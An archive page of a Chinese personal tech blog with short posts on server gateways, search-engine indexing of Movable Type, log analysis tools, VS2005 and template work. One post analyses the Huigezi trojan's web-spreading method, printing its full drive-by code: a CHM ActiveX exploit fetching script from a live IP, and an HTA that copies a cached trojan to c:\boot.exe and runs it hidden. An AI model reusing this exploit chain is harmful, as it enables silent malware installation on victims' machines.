对于一个server,如果仅仅设置ip、掩码,而不设置网关。在同网段的机器就可以正常访问,不受任何影响。而对于不同网段机器,是不能访问的。
所以,有时为了保证服务器安全,比如采用多层结构,前面有前台服务器,然后数据服务器。采用前台服务器与数据服务连接,而前台服务器开放,数据服务器出于安全起见,就可以不设置网关。
当然,有些时候,因为不设置网关,也会出问题。遇到2次了:9
Recently in Study Notes Category
这个域名已经使用了大概3个月了。文章有了253篇了。
使用mt,也是为了生成静态,便于搜索引擎查找。现在看看效果:
google:可以搜索到384篇。平均1天扫描站点2-3次
baidu:可以搜索到8380篇,每小时扫描2次
但还有一个Inktomi Slurp的搜索引擎,扫描次数也是不低,仅仅次于baidu。但我不知道是从何而来
再看看搜索后的结果:
对于google,搜索到的排名靠前的,都是分类或者日期的归档,几乎所有的单篇归档或者文章,都被忽略。
而对于baidu,几乎所有的归档都可以搜索到。且排序上不能很严格的看出是单篇归档,还是分类等。
然后对比车东的blog,却可以在google上得到比baidu多的多得结果。
再来看网站的来自于搜索引擎的页面:
可以看到,baidu对比google,已经是10倍的关系了。这个也是和收录的网页数目有关。
所以分析来,主要有以下几点原因吧:
1、google的扫描似乎会判断文件日期。而对于mt,每次修改模版,都会重建所有页面,导致了google中认为你的网站不稳定,而google对于经常变动的文章不会收录。而baidu似乎则相对宽松。几乎我发布的文章,第二天就会出现。
2、google对于一个页面的判断,还是偏重于<h1></h1>标签。google认为,一个页面的标题,或者主要内容,主要是有<h1>中的内容决定,而不是考虑<title></title>。这样就导致对于mt的一个问题。mt所有页面在默认模版中,都是使用<h1>来标定blog的名字。也就是说,我所有的页面的这一部分信息,都是meteor's blog。对于google来说,这就是类似页面,或者说是相同页面,也就会在搜索结果中忽略,不被收录。而baidu则要好得多,采用<title>来重点判断我的页面信息。以<title>来进行收录。
所以来说,mt对于google来说,优势主要在于,使用静态页面,便于搜索。而且目录结构合理,最多2级,符合google的习惯。而缺点也很明显,默认的<h1>内容不适合google的搜索,导致重复结果太多。
由此可见,如果想要得到更好的收录,需要重新来订制下网页结构。
下一步要做的,就是重新修改模版。使得blog的题目在<h1>中出现。并且减少模版修改次数,使得生成的页面可以保持长时间不用重建。
局域网内的管理软件,今天上网找了下,发现还是中国人写的比较多,而且功能也越来越强大。
原理都是安装winpcap,使网卡工作在混杂模式下,然后进行相应的操作。
说不定什么时候会用到,把看到的介绍都转过来吧。都没有测试。
Continue reading 局域网管理工具.
费了n长时间,终于拖下来了。本来打算等ts版本,后来觉得pro已经够用了,就下载下来了
只是安装了,还没仔细研究。感觉变化好大。很明显的2个区别,就是现在安装vs已经不需要安装iis了,vs中终于自己带了web支持。而vs中对于web设计来说,也增加n多的控件,比以前方便多了,易用性也提高很多。
vs也终于使用了div来布局,默认Transitional标准。
具体一点的变化,过几天再说吧,先用2005写一点东西:)
Continue reading visual studio 2005专业版.
一直用greatnews来浏览rss。可当我回家的时候,自己的电脑上没有安装,但又想看。这个时候,建立一个网站上的rss聚合就是不错的选择了。
MetaPlanet是一个php的聚合程序。官方网站http://laurel.datsi.fi.upm.es/web/metaplanet/。在右面有它的一些演示。
主要特性如下
Calendar
Faces support with size control
Images cache
Generated web pages cache
Easy to customize
Themes support
UTF-8 output
Syndication join request
Blacklists managed by
Admin
Automatically
Ultra-fast
Internationalization support
EN
ES
我第一个使用的就是这个程序,下面写下他的安装方法。
Continue reading 使用MetaPlanet来建立自己的聚合.
midgard是另外一款开源的cms,基于linux,php(lamp),mysql,apache。
官方网站http://www.midgard-project.org/
官方网站http://www.midgard-project.org/
Continue reading 在ubuntu/debian下安装midgard.
Microsoft JET Database Engine 错误 '80040e10'至少一个参数没有被指定值。
分析原因,很简单的原因。数据库中的字段与你程序中的字段不一样。
比如
select * from test where aaa
而在数据库中不存在这个字段,就会这种问题
wp现在推出了2.0,后台比以前人性化了一点。但编辑器依然让我不爽。
感觉wp用起来还是没有mt舒服。但wp也是需要考虑的一个blog。
wp2.0之后,导入mt数据比以前方便了很多。
具体方法是,在mt中选择 导入/导出,然后将数据导出,保存为一个txt文件。
然后进入wp,在后台选择导入。选择mt,然后按照提示进行即可
Log files are not fun to look at. They are ugly, contain too much information, and often lead to massive headaches. Fortunately, these beasts can be tamed for more capacities than just debugging; they can used to generate wonderful reports that make sense. A number of programs are out there to analyze Web server logs, and this article will cast the spotlight in their direction.
Before evaluating the software packages, determine the type of data you wish to see. Although most of the software we looked at supports more than just Web server logs, this article discusses only Web server output. Log analysis programs can show everything from a list of IP addresses connected to the Web server to a pie chart detailing which files were accessed most often. The majority of popular Web log analysis tools try to make sense of every piece of data in the logs, but few succeed in making the data readable.
Some log file analysis packages cannot distinguish pertinent information from the raw log file itself. Displaying statistics in an aesthetically pleasing manner is a very important attribute. Every once in a while, user interface designers create a new paradigm, setting a standard that other designers attempt to emulate. Arguably, Apple has done this with its OS X desktop environment, and some Web log analysis programs do this better than others.
Webalizer is one popular log analysis tool. Many people prefer it because it is written in C and runs quite fast. The graphics, however, are not optimal. The gd graphics library supplies some readable charts, but they are not as aesthetically attractive as they could be. The reports themselves are sufficient for providing a quick glimpse of a few important data points; namely "what pages are accessed" and "how many hits are we getting." A wealth of information can be extracted from Web logs. When done properly, the information is not so overwhelming. Webalizer is adequate, but its mediocre graphics and lack of statistics, earn it a mere three stars in our five-star ad hoc award system.
Analog, favored by a small group of die-hard fans, is another worthy contender. Analog attempts to present everything, but it is an example of how to include too much information for normal human consumption. By default, everything is displayed on the same Web page. A navigation bar at the top allows users to click on a specific report, which drills down to another section of the page. Analog's saving grace is the navigation bar at the top of each section, which simplifies the navigation — somewhat. Analog's more interesting reports include listings of: how many hits come from each country (TLD, actually), search engine queries that brought users to the Web site, and which browsers and operating systems visitors used. The software is capable of presenting just about everything else derivable from Web server logs. The graphics are a slight improvement over Webalizer gd-based graphics, but the pie and bar charts still leave much to be desired. Because Analog includes much useful information, and the navigation isn't completely unusable, we feel it deserves an apprehensive four out of five stars.
Summary is a commercial log analysis tool for which a 30-day trial is available. This package includes all possible information and lists options in a text Web page for users to click on. When you follow a link, for example, "Bandwidth Peak," you are brought to fairly decent Web page that lists bandwidth usage by time. A small bar graph accompanies each entry, but the graphics in Summary are quite minimal. Here, minimal is not a defect. Quite the contrary; Summary is really decent looking. However, the overall GUI is cumbersome, and it took us a good bit of time to browse to each report we wished to see. The cost of Summary is not prohibitive, and the reports are decent, albeit not awe-inspiring. We rate it four out of five.
No discussion of Web log analysis software would be complete without at least a nod to WebTrends. The sheer scope of WebTrends Web Log Analyzer (another commercial offering) earns it an honorable mention here. Its Web site makes the auspicious claim of increasing return on investment, and even asserts "This is Complete Web Analysis." Not surprisingly, WebTrends is not for organizations with skinny wallets. The online demos reflect how great GUI design should look, and it does indeed look great. The company's claims of usability appear founded, and it has even included a way to access all of the information available from Web server logs. WebTrends has been around for more than a decade and plays nicely with IIS. We are giving it four out of five stars, based solely on what we learned in the product's impressive Web-based demo.
The grail of log analysis, AWStats, is by far the best looking of all of the Free Web log analysis tools we've seen. AWStats is also the only Perl-based application on the list. Its graphics are superb, and its information is presented in an excellent manner. At a glance, users can view all available reports and navigate seamlessly between them. Many users will be amazed at the amount of detail the program can extract from the log files. Small browser icons and flags for various countries add to the already-pleasing GUI. AWStats includes all of the features mentioned above for other programs, and is in a readable format, to boot. We give it the full five stars.
Of course, there are countless other log analysis programs, but these are the more commonly deployed ones.
Compatibility, which is normally a key issue, is not a great concern when it comes to log analysis tools. The Apache Web server produces logs in a standardized format, called NCSA combined log files. IIS W3C conformant format is also supported by most of the analysis programs listed here.
In a later article, we will explore the other types of log files most of these programs can work on, including mail and FTP.
我需要一个web分析软件。应该具有如下的功能:
1、具有普通log分析的功能
2、可以记录每个页面访问时提交的信息,比如asp?后面的内容
3、可以具体分析出访问某个具体页面的visitors。或者可以查看某个visitor访问过的页面
第一条似乎100%的log分析软件实现了。
第二条似乎大部分分析软件都去掉了:(
第三条支持的也不多,我只见过一个
今天测试了n个log分析软件。发现还是一个叫做web log explorer的符合要求,而且是他的pro版本。免费试用30,我没有找到破解。。
主要功能如下图。
打算重新写界面了,依然是div+css。
从网上找了张图片。要把它移植到mt下。难度不小
用golive写了下,发现太方便了,对于层的布局,定位,等等。而且更重要的是,golive里面居然直接就有mt的控件,可以直接使用,太爽了
今天晚上写了一晚上的css,以及分析wp和mt的模版构成。
可以很顺利的把wp模版转到mt上,呵呵。
明天开始动手了:0
如何使地址栏的HTTP地址保持不变,即在点击主页中的链接到另一个页面但地址栏中的地址还为主页地址?
<html>
<head>
<title></title>
<meta content="text/html; charset=gb2312" http-equiv=Content-Type>
---------------------------------------------------------------------------
<frameset border=false frameborder=0 framespacing=0 rows=0,* >
---------------------------------------------------------------------------
<frame marginheight=0 marginwidth=0 name=refresh noResize scrolling=no src="blank.htm">
<frame name=hl8 src="default.asp" scrolling="auto" noresize >
<noframes>
<body topmargin="0" leftmargin="0"><!--msnavigation-->
<p>This page uses frames, but your browser doesn't support them.</p>
</body>
</noframes></frameset></html>
今天打算换一个模版。
正在进行中。。。
如果访问不正常,见谅。。。
昨天晚上实在无聊,想想自己的电脑,windows下,dos下刷bios的次数太多了。
看看主板启动之后按alt+F2自动升级是什么样子。
于是,把主板bios版本降低,然后再刷回去。。。就是下面的画面了。不错奥
用手机照得:)
最近中灰鸽子木马的人不少,分析一下灰鸽子的网页传播方式
黑鸽子会产生一个frame,如下:
<iframe src="http://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie='fucksnow';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='nt';if(!(ver.indexOf('Windows 98')==-1)){ie='98';}location.href=ie+'.htm';</script>
页面中嵌入的iframe是掩人耳目的,重要的不是ifrme部分,而是后面的javascrpit部分
<iframe src="http://www.qq.com/" width="800" height="600"></iframe> //掩人耳目
<script language=javascript>
ie='fucksnow'; //定义变量ie=fucksnow
ver=navigator.appVersion; //获得浏览器版本
if(!(ver.indexOf('NT 5.0')==-1)) ie='nt'; //如果是2k系统则ie=nt
if(!(ver.indexOf('Windows 98')==-1)) {ie='98';} //定义变量ie=98
location.href=ie+'.htm'; //重定向到 ie+'.htm'
</script>
佩服作者的细心,这三个htm:98.htm nt.htm 和fucksnow.htm只有一个地方不同,就是利用的chm文件的所在位置不一样,作者根据98 2k和 xp的帮助文件位置不同设置了几个不同的运行条件,从这方面看作者到做的非常好,比国内很多的软件商都要好得多
我们以fucksnow.htm为例做分析:如果直接查看fucksnow.htm的源代码可以看到里面似乎是乱码,其实不然,这是利用了IE解析Html代码的时候忽略空格的特性。我们把里面所有的空格去掉,再稍微整理,就可以看到下面的代码了(空格都被去掉了,代码有点乱)。
<SCRIPTlanguage=VScriptsrc="mmmmm.gif"></SCRIPT> //加载mmmmm.gif,这个其实不是图片,后面会说到
<SCRIPTlanguage=VScriptsrc="xxxxx.pif"></SCRIPT> //加载xxxxx.pif,灰鸽子木马
<HTML><BODY>
<divstyle="display:none">
//利用chm漏洞
<OBJECTid="news140"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
<PARAMname="Item1"value='command;/windows/help/apps.chm');</OBJECT>
<OBJECTid="news162"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
//利用chm漏洞执行mmmmm.gif里面的脚本程序
<PARAMname="Item1"value='command;javascript:eval("document.write("<SCRIPTlanguage=JScriptsrc="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
//又是一个障眼法,重定向到http://xuemulove.com/a.gif,文件不存在
<iframesrc="http://xuemulove.com/a.gif"width="0"height="0">
</iframe><BODYonload="window.status='页面已装载!'">
mmmmm.gif分析:代码隐藏原理和fucksnow.htm一样,替换掉空格后看到以下代码
document.write('<html><HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>'); //把弹出窗口移到x,y=4000,4000的位置,另你看不到
//利用ADODB写文件
try{BOSSYU=newActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
//写进去的代码
<HTML><BODYonLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
//利用HTA执行所需要的操作
<HTA:APPLICATIONID=kk3714CAPTION="no"BORDER="none"HEIGHT="0"SHOWINTASKBAR="no"WIDTH="0">
<BODYscroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPTLANGUAGE="JavaScript">
//在打开fucksnow.htm的时候已经加载了xxxxx.pif文件,这时该文件已经在IE的缓存中。由于IE的一些特性,该文件会被保存为xxxxx[1].pif xxxxx[2].pif等类似的文件名,下面的程序子就是为了把他找出来,并执行他
function thanks(b){
try{
varc=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"xxxxx[1].pif";
var z1=c.item().Path+"xxxxx[2].pif";
var f="C\:boot.exe";
if(YUri.FileExists(zI01)) //找到木马文件xxxxx[1].pif
{YUri.CopyFile(zI01,f) //copy到 c:\boot.exe
w00sh.Run(f,0,false); //执行木马
v=1;break;}
if(YUri.FileExists(z1)) //同上,只不过文件名为xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}
catch(e){}}
function agree(){
path="c:\boOt.bat"; //建立boot.bat批处理
v=kk3714.commandLine;
v=v.substring(1,v.length-2);
var_w=YUri.CreateTextFile(path);
_w.Write('@eCho oFf rn:ArnDeL"'+v+'"rnifeXiSt"'+v+'"gOtoArnDEl%0'); //写命令到boot.bat里面,BAT里面的内容:
====================
@echo off
:a del v //删除v , v为该执行文件c:\bootlog.hta
if exist v goto a //如果还没删除则转到 a,继续执行删除操作
del 0% //自删除
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
//获得IE缓存存放位置以查找xxxxx.pif
varv=0;
try{
varYUri=newActiveXObject("Scripting.FileSystemObject");
varw00sh=newActiveXObject("WScript.Shell");
varcache=w00sh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+'..');setTimeout("fish()",4000);}else{agree();}}catch(e){}}
fish();</SCRIPT></BODY></HTML>";
//存为c:\bootlog.hta并执行
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:\bootlog.hta",0);}catch(e){}document.write('<objectid="bbs1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="shortcut"><paramname=item1value=",c:\bootlog.hta"></object>
<OBJECTid="bbs2"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="Close"><paramname=kav"value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>');
基本上是利用了chm漏洞,如果系统打过所有补丁是不会中招的;临时禁用java script也可以防止。
这两天把服务器重新配置了一下。
以为以前配置过,这次应该没有问题。结果还是发现有不少的问题。。
首先遇到的,就是我的2颗op 的cpu,只能识别1颗。
还有关于mt的一些增强功能的配置,vsftp虚拟用户,awstats的配置。
当时虽然配置过,也记录了下来,但blog的迁移,导致了部分数据丢失,遇到的错误的解决方法也忘记了,只能重新来。。。
今天居然是自己重新编译了几个包,然后安装,来配置mt。。晕了。。
等正常后,把完整的配置说明放上来。。
ps:mt迁移真的很方便。。。
终于找到了同步的方法,等同步完成,然后放出来。
汉化的opensource的php已经完成,非常好的程序:)
php+mysql
FCKConfig.ToolbarSets["Default"] = [
['Undo','Redo','Replace','RemoveFormat'],
['Bold','Italic','Underline','StrikeThrough'],
['Link','Unlink','Anchor'],
['Flash','Rule','Smiley','SpecialChar','PageBreak'],
['Source','TextColor','BGColor','Image','Style']
] ;
FCKConfig.ToolbarSets["Basic"] = [
['Bold']
] ;
<Styles>
<Style name="blockquote" element="blockquote">
</Style>
</Styles>
不得不承认,golive是大势所趋,和ps的结合,真的太方便了。
也不得不放弃dw了,虽然很喜欢,也很习惯。
golive的使用方式,真的不习惯,让我很不爽。还好,找到一个不错的站点。学习下
![http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")'](http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")'){kind=link}
![http://xuemulove.com/a.gif"width="0"height="0](http://xuemulove.com/a.gif"width="0"height="0){kind=link}